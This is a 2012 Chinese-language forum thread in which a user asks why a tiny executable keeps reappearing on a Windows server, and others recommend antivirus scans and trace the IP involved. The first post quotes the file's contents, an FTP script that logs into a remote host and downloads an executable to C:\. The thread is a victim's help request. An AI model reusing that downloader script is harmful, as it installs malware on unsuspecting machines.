C:\下不定時出現1K執行檔

ElicLee
個人積分：5分
文章編號：36219269

5分

樓主

2012-05-30 22:41

最近發現在C:\會出現 xxx.exe
大小約1k，用記事本打開的內容大概都是連到遠端下載程式回來，類似：
-----------------------------------------------
open 111.112.113.114
123
123
get xxx c:\zzzz.exe
bye
-----------------------------------------------

zzzz.exe 不是1K的執行檔，大小約數百K

在刪除該 zzzz.exe 後，幾天後又突然出現 xxx.exe

我在想應該是之前中過Autorun的關係

但之前已刪除處理，現在所有磁碟下都找不到 autorun.inf 了

隨身碟全部都有檢查過，沒什麼問題

請問有人出現跟我類似的情形嗎？

環境：WIN2008R2+NOD32

2012-05-30 22:41 發佈

文章關鍵字執行檔 1K

肥貓宅男

肥貓宅男
個人積分：1641分
文章編號：36220254

1641分

2樓

2012-05-30 23:20

建議用KAVO再掃一次比較安全

passnext

passnext
個人積分：5分
文章編號：36238831

5分

3樓

2012-05-31 18:11

使用強大的閃電殺毒手掃描能不能清掉可疑程式(建議先接上所有隨身碟再操作)
網址：http://cn.trendmicro.com/cn/mini/cleantool/index.html

※建議可以下載後完成更新，進入安全模式再操作
http://windows.microsoft.com/zh-TW/windows-vista/Start-your-computer-in-safe-mode

pingyingtu

pingyingtu
個人積分：2059分
文章編號：36244370

2059分

4樓

2012-05-31 22:52

有沒有灌過祖國的程式？
小心有木馬

http://www.ip-adress.com/ip_tracer/111.112.113.114

IP address [?]: 111.112.113.114 [Whois] [Reverse IP]
IP country code: CN
IP address country: ip address flag China
IP address state: Beijing
IP address city: Beijing
IP address latitude: 39.9289
IP address longitude: 116.3883
ISP of this IP [?]: CHINANET ningxia province network
Organization: CHINANET ningxia province network
Local time in China: 2012-05-31 22:50